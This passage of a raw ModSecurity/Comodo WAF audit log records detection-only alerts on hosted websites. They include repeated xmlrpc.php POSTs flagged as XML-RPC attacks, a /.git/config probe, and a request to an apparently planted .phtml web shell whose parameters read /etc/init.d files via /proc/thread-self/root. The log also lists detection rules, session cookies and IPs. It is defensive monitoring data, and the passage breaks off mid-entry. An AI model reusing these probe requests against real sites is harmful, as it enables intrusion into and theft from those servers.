yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=4d5341da0f4c70638fdaabba1ca32f8f%7C%7C1750290581%7C%7C1750286981%7C%7Cf4f1c485a2c6127d681cbf576a9cd0e7; expires=Wed, 18 Jun 2025 23:49:41 GMT; Max-Age=172800; path=/ Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --e6608404-E-- --e6608404-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 146.190.105.35 (46+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 146.190.105.35 (46+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "sarainternational.cstechns.com"] [uri "/xmlrpc.php"] [unique_id "aFCtlGj9J38fG6WAr4pZfQAAAAk"] Apache-Handler: proxy:unix:/var/www/vhosts/system/sarainternational.cstechns.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750117780794649 1053766 (- - -) Stopwatch2: 1750117780794649 1053766; combined=3373, p1=388, p2=2405, p3=132, p4=53, p5=244, sr=84, sw=151, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --e6608404-Z-- --e9fab85b-A-- [17/Jun/2025:05:20:11.879328 +0530] aFCtslJfblPUQiSn5r2TNgAAAAA 62.232.33.62 41684 127.0.0.1 7081 --e9fab85b-B-- POST /?ob=open-bridge/events HTTP/1.0 Host: www.retaxis.com X-Real-IP: 62.232.33.62 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 401 sec-ch-ua-platform: "Linux" user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36 Edg/98.0.1108.62 sec-ch-ua: "Chromium";v="130", "Google Chrome";v="130", "Not?A_Brand";v="99" content-type: text/plain;charset=UTF-8 sec-ch-ua-mobile: ?0 accept: */* origin: https://www.retaxis.com sec-fetch-site: same-origin sec-fetch-mode: cors sec-fetch-dest: empty referer: https://www.retaxis.com/custom-ecommerce-website-design-company accept-encoding: gzip, deflate, br, zstd accept-language: en-US,en;q=0.9 priority: u=1, i cookie: _fbp=fb.1.1750117767341.377093287952731360; twk_idm_key=Pxn7sDdB8eHeokVFCHXmF; TawkConnectionTime=0; twk_uuid_56d47e43ba96cf5d2ca9404e=%7B%22uuid%22%3A%221.70iWcVHXTOySfWpEsNAMy9f5TMPXEOGaS2ZxRds9VHyztCt0nPtEx9k6ughc2Qvfq93ISWsWDE59ogFcXhM0hB0pNgXHL9Fck2zwR9uavt6EB7lQvlJR%22%2C%22version%22%3A3%2C%22domain%22%3A%22retaxis.com%22%2C%22ts%22%3A1750117768552%7D; _sfs_id=9d2df1cd2b741cf8e0789746b9714d6a1750117768; PHPSESSID=kv5eoji37btcfeobqs1ol35cap --e9fab85b-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.2.28 Vary: Origin,Accept-Encoding Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Access-Control-Allow-Origin: https://www.retaxis.com Access-Control-Allow-Credentials: true Access-Control-Max-Age: 86400 Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8 --e9fab85b-E-- --e9fab85b-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||www.retaxis.com|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Message: Warning. Operator GE matched 5 at TX:incoming_points. [file "/etc/apache2/modsecurity.d/rules/comodo_free/20_Outgoing_FiltersEnd.conf"] [line "35"] [id "214930"] [rev "1"] [msg "COMODO WAF: Inbound Points Exceeded|Total Incoming Points: 5|www.retaxis.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "FiltersEnd"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||www.retaxis.com|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.retaxis.com"] [uri "/"] [unique_id "aFCtslJfblPUQiSn5r2TNgAAAAA"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator GE matched 5 at TX:incoming_points. [file "/etc/apache2/modsecurity.d/rules/comodo_free/20_Outgoing_FiltersEnd.conf"] [line "35"] [id "214930"] [rev "1"] [msg "COMODO WAF: Inbound Points Exceeded|Total Incoming Points: 5|www.retaxis.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "FiltersEnd"] [hostname "www.retaxis.com"] [uri "/index.php"] [unique_id "aFCtslJfblPUQiSn5r2TNgAAAAA"] Apache-Handler: proxy:unix:/var/www/vhosts/system/retaxis.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750117810654944 1224510 (- - -) Stopwatch2: 1750117810654944 1224510; combined=6930, p1=594, p2=6098, p3=93, p4=31, p5=114, sr=119, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --e9fab85b-Z-- --d7e84c6d-A-- [17/Jun/2025:05:20:23.292870 +0530] aFCtvgJ4p5Cdblnjra55iAAAAAI 62.232.33.62 58662 127.0.0.1 7081 --d7e84c6d-B-- POST /?ob=open-bridge/events HTTP/1.0 Host: www.retaxis.com X-Real-IP: 62.232.33.62 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 376 sec-ch-ua-platform: "Linux" user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36 Edg/98.0.1108.62 sec-ch-ua: "Chromium";v="130", "Google Chrome";v="130", "Not?A_Brand";v="99" content-type: text/plain;charset=UTF-8 sec-ch-ua-mobile: ?0 accept: */* origin: https://www.retaxis.com sec-fetch-site: same-origin sec-fetch-mode: cors sec-fetch-dest: empty referer: https://www.retaxis.com/privacy-policy accept-encoding: gzip, deflate, br, zstd accept-language: en-US,en;q=0.9 priority: u=1, i cookie: _fbp=fb.1.1750117767341.377093287952731360; twk_idm_key=Pxn7sDdB8eHeokVFCHXmF; _sfs_id=9d2df1cd2b741cf8e0789746b9714d6a1750117768; PHPSESSID=kv5eoji37btcfeobqs1ol35cap; TawkConnectionTime=0; twk_uuid_56d47e43ba96cf5d2ca9404e=%7B%22uuid%22%3A%221.70iWcVHXTOySfWpEsNAMy9f5TMPXEOGaS2ZxRds9VHyztCt0nPtEx9k6ughc2Qvfq93ISWsWDE59ogFcXhM0hB0pNgXHL9Fck2zwR9uavt6EB7lQvlJR%22%2C%22version%22%3A3%2C%22domain%22%3A%22retaxis.com%22%2C%22ts%22%3A1750117811016%7D --d7e84c6d-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.2.28 Vary: Origin,Accept-Encoding Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Access-Control-Allow-Origin: https://www.retaxis.com Access-Control-Allow-Credentials: true Access-Control-Max-Age: 86400 Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8 --d7e84c6d-E-- --d7e84c6d-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||www.retaxis.com|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Message: Warning. Operator GE matched 5 at TX:incoming_points. [file "/etc/apache2/modsecurity.d/rules/comodo_free/20_Outgoing_FiltersEnd.conf"] [line "35"] [id "214930"] [rev "1"] [msg "COMODO WAF: Inbound Points Exceeded|Total Incoming Points: 5|www.retaxis.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "FiltersEnd"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||www.retaxis.com|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.retaxis.com"] [uri "/"] [unique_id "aFCtvgJ4p5Cdblnjra55iAAAAAI"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator GE matched 5 at TX:incoming_points. [file "/etc/apache2/modsecurity.d/rules/comodo_free/20_Outgoing_FiltersEnd.conf"] [line "35"] [id "214930"] [rev "1"] [msg "COMODO WAF: Inbound Points Exceeded|Total Incoming Points: 5|www.retaxis.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "FiltersEnd"] [hostname "www.retaxis.com"] [uri "/index.php"] [unique_id "aFCtvgJ4p5Cdblnjra55iAAAAAI"] Apache-Handler: proxy:unix:/var/www/vhosts/system/retaxis.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750117822165868 1127108 (- - -) Stopwatch2: 1750117822165868 1127108; combined=4827, p1=459, p2=4105, p3=106, p4=34, p5=122, sr=103, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --d7e84c6d-Z-- --2c6d4601-A-- [17/Jun/2025:05:20:42.409438 +0530] aFCt0VCTF37l_jAzt4oUqQAAAAU 146.190.105.35 47162 127.0.0.1 7081 --2c6d4601-B-- POST //xmlrpc.php HTTP/1.0 Host: sarainternational.cstechns.com X-Real-IP: 146.190.105.35 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 489 Cookie: PHPSESSID=cqetco44gf2flqlij9jk1hbgqr; wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_d852da6aaab499d6de07ce308954a0%7C%7C1750290640%7C%7C1750287040%7C%7C785e1fadded1ce480876a74a86b176dd; yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=a903f499e92e9e65817cd6a59803a23c%7C%7C1750290640%7C%7C1750287040%7C%7Cd6346a41cc4bef05efa19e790ec51421 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 Content-Type: application/xml --2c6d4601-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Connection: close Set-Cookie: PHPSESSID=esadk13fcofqjeinvr670dqgir; path=/ Set-Cookie: wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_f596ffa15d81554794487c30c74892%7C%7C1750290642%7C%7C1750287042%7C%7C39a4423a2ffe170c8f6ba375208469c4; expires=Wed, 18 Jun 2025 23:50:42 GMT; Max-Age=172800; path=/; secure; HttpOnly Set-Cookie: yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=bd8df34ed9dcbddfca44b5c568b81487%7C%7C1750290642%7C%7C1750287042%7C%7C5608ac723fc78d8d21d8b262cebb1a3a; expires=Wed, 18 Jun 2025 23:50:42 GMT; Max-Age=172800; path=/ Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --2c6d4601-E-- --2c6d4601-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 146.190.105.35 (46+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 146.190.105.35 (46+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "sarainternational.cstechns.com"] [uri "/xmlrpc.php"] [unique_id "aFCt0VCTF37l_jAzt4oUqQAAAAU"] Apache-Handler: proxy:unix:/var/www/vhosts/system/sarainternational.cstechns.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750117841213258 1196277 (- - -) Stopwatch2: 1750117841213258 1196277; combined=3770, p1=484, p2=2864, p3=106, p4=43, p5=180, sr=110, sw=93, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --2c6d4601-Z-- --53ed4b4a-A-- [17/Jun/2025:05:20:57.095916 +0530] aFCt4VCTF37l_jAzt4oUvQAAAAU 216.73.216.240 44578 127.0.0.1 7081 --53ed4b4a-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fproc%2Fthread-self%2Froot%2Fetc%2Finit.d&viewfile=%2F%2Fproc%2Fthread-self%2Froot%2Fetc%2Finit.d%2Fcryptdisks HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.240 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --53ed4b4a-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3440 Connection: close Content-Type: text/html; charset=UTF-8 --53ed4b4a-H-- Message: Warning. Matched phrase "etc/init.d" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:path: /proc/thread-self/root/etc/init.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Message: Warning. Matched phrase "etc/init.d" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:viewfile: /proc/thread-self/root/etc/init.d/cryptdisks"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/init.d" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:path: /proc/thread-self/root/etc/init.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFCt4VCTF37l_jAzt4oUvQAAAAU"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/init.d" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:viewfile: /proc/thread-self/root/etc/init.d/cryptdisks"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFCt4VCTF37l_jAzt4oUvQAAAAU"] Apache-Handler: application/x-httpd-php Stopwatch: 1750117857091615 4355 (- - -) Stopwatch2: 1750117857091615 4355; combined=2421, p1=351, p2=1903, p3=42, p4=32, p5=93, sr=89, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --53ed4b4a-Z-- --5ba0a526-A-- [17/Jun/2025:05:21:42.925496 +0530] aFCuDdyZ4SMykfn97vy5YQAAAAs 146.190.105.35 46024 127.0.0.1 7081 --5ba0a526-B-- POST //xmlrpc.php HTTP/1.0 Host: sarainternational.cstechns.com X-Real-IP: 146.190.105.35 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 490 Cookie: PHPSESSID=38rv4g483qlon0p28vfkbg7s1j; wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_d51dcf68c58bcf54e161848c156e46%7C%7C1750290701%7C%7C1750287101%7C%7C144674ac06cb7e80de2f19d202fb0f48; yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=a0780a6dd079bb8046f6524ea3c72b63%7C%7C1750290701%7C%7C1750287101%7C%7C34640902ed49e37c0030ae50a8493ad6 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 Content-Type: application/xml --5ba0a526-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Connection: close Set-Cookie: PHPSESSID=h9fk2ptucn05s9epjfnnv3huhb; path=/ Set-Cookie: wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_0c7d9f9279b0462824de9fe4e0214e%7C%7C1750290702%7C%7C1750287102%7C%7Ca901af80c91ef7acb44317188cb4012d; expires=Wed, 18 Jun 2025 23:51:42 GMT; Max-Age=172800; path=/; secure; HttpOnly Set-Cookie: yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=924282f5f12f7f14ca38235385534dd7%7C%7C1750290702%7C%7C1750287102%7C%7C55f67b5e7622b47192fadeab60d325ac; expires=Wed, 18 Jun 2025 23:51:42 GMT; Max-Age=172800; path=/ Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --5ba0a526-E-- --5ba0a526-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 146.190.105.35 (46+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 146.190.105.35 (46+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "sarainternational.cstechns.com"] [uri "/xmlrpc.php"] [unique_id "aFCuDdyZ4SMykfn97vy5YQAAAAs"] Apache-Handler: proxy:unix:/var/www/vhosts/system/sarainternational.cstechns.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750117901866106 1059470 (- - -) Stopwatch2: 1750117901866106 1059470; combined=2786, p1=378, p2=2016, p3=103, p4=43, p5=153, sr=90, sw=93, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --5ba0a526-Z-- --8c76cc05-A-- [17/Jun/2025:05:22:13.150688 +0530] aFCuK31eJdaXKB8u1kJJDwAAAAg 34.138.101.3 44362 127.0.0.1 7081 --8c76cc05-B-- GET /.git/config HTTP/1.0 Host: www.gulachi.com X-Real-IP: 34.138.101.3 X-Accel-Internal: /internal-nginx-static-location Connection: close Accept-Encoding: gzip --8c76cc05-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Pragma: no-cache Link: <https://www.gulachi.com/wp-json/>; rel="https://api.w.org/" Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private WPO-Cache-Status: not cached WPO-Cache-Message: Page type is not cacheable (search, 404 or password-protected), This page returned an HTTP unauthorised response code (404) Set-Cookie: PHPSESSID=10l4tcr0f4dkshokj2t65fu7sg; path=/ Set-Cookie: _sfs_id=87eb3c9f74acb136026ed2d0164142911750117932; expires=Tue, 17 Jun 2025 00:52:12 GMT; Max-Age=3600; path=/; secure; HttpOnly Connection: close Content-Type: text/html; charset=UTF-8 --8c76cc05-H-- Message: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.gulachi.com"] [uri "/.git/config"] [unique_id "aFCuK31eJdaXKB8u1kJJDwAAAAg"] Apache-Handler: proxy:unix:/var/www/vhosts/system/gulachi.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750117931397966 1752799 (- - -) Stopwatch2: 1750117931397966 1752799; combined=1714, p1=426, p2=1187, p3=0, p4=0, p5=101, sr=106, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --8c76cc05-Z-- --b0711038-A-- [17/Jun/2025:05:22:42.373278 +0530] aFCuSQrsPejRtmHkrKLiiQAAAAE 146.190.105.35 49376 127.0.0.1 7081 --b0711038-B-- POST //xmlrpc.php HTTP/1.0 Host: sarainternational.cstechns.com X-Real-IP: 146.190.105.35 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 493 Cookie: PHPSESSID=d3fuft6hf7unq3asupbsplfg5e; wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_b8ecb9742257ee73890c2306965064%7C%7C1750290760%7C%7C1750287160%7C%7C674b3bee78ce0f7c2be3913cd244384c; yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=ee923dbb747b7ce2fadd7503e8496f8c%7C%7C1750290761%7C%7C1750287161%7C%7C91e168ff4d4cbeb8de11424e20c2328b User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 Content-Type: application/xml --b0711038-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Connection: close Set-Cookie: PHPSESSID=jim448etut2ho7samd74pqtlrt; path=/ Set-Cookie: wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_e533a56a642888ab0dabf653a88335%7C%7C1750290762%7C%7C1750287162%7C%7Cc678f254761ce87c635d0a8c9697d6ab; expires=Wed, 18 Jun 2025 23:52:42 GMT; Max-Age=172800; path=/; secure; HttpOnly Set-Cookie: yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=e52a4f891b5b9c3e3f5a90e5047b25f9%7C%7C1750290762%7C%7C1750287162%7C%7Ce889e709b9eff4b03d8aa936ab09ba55; expires=Wed, 18 Jun 2025 23:52:42 GMT; Max-Age=172800; path=/ Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --b0711038-E-- --b0711038-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 146.190.105.35 (45+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 146.190.105.35 (45+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "sarainternational.cstechns.com"] [uri "/xmlrpc.php"] [unique_id "aFCuSQrsPejRtmHkrKLiiQAAAAE"] Apache-Handler: proxy:unix:/var/www/vhosts/system/sarainternational.cstechns.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750117961283301 1090064 (- - -) Stopwatch2: 1750117961283301 1090064; combined=2797, p1=395, p2=2016, p3=99, p4=39, p5=155, sr=94, sw=93, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --b0711038-Z-- --80cd9d4f-A-- [17/Jun/2025:05:23:42.877096 +0530] aFCuheTJOk1gXj_qIh4aOQAAAAQ 146.190.105.35 51220 127.0.0.1 7081 --80cd9d4f-B-- POST //xmlrpc.php HTTP/1.0 Host: sarainternational.cstechns.com X-Real-IP: 146.190.105.35 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 493 Cookie: PHPSESSID=74apj57lp6hkou07fqas5joh1f; wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_7625e821b7468579b22e4e83fc61f9%7C%7C1750290821%7C%7C1750287221%7C%7C93f9fa9c10714fa3db42097c45876f5e; yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=3486f6ae968b817086e083a4583f04e6%7C%7C1750290821%7C%7C1750287221%7C%7C44c2d4a312a88baf8a6e439841f429f5 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 Content-Type: application/xml --80cd9d4f-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Connection: close Set-Cookie: PHPSESSID=oth44rfidmat1p4tmr0lb66uif; path=/ Set-Cookie: wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_02c9b7277585db03aa160252de4f99%7C%7C1750290822%7C%7C1750287222%7C%7C1f5556155eb44461471ab09ef914e611; expires=Wed, 18 Jun 2025 23:53:42 GMT; Max-Age=172800; path=/; secure; HttpOnly Set-Cookie: yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=18d6e5a2862054ea146c2d93b0d14074%7C%7C1750290822%7C%7C1750287222%7C%7C673a21809b8cf1350f0dc4708a9fbdfa; expires=Wed, 18 Jun 2025 23:53:42 GMT; Max-Age=172800; path=/ Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --80cd9d4f-E-- --80cd9d4f-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 146.190.105.35 (46+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified 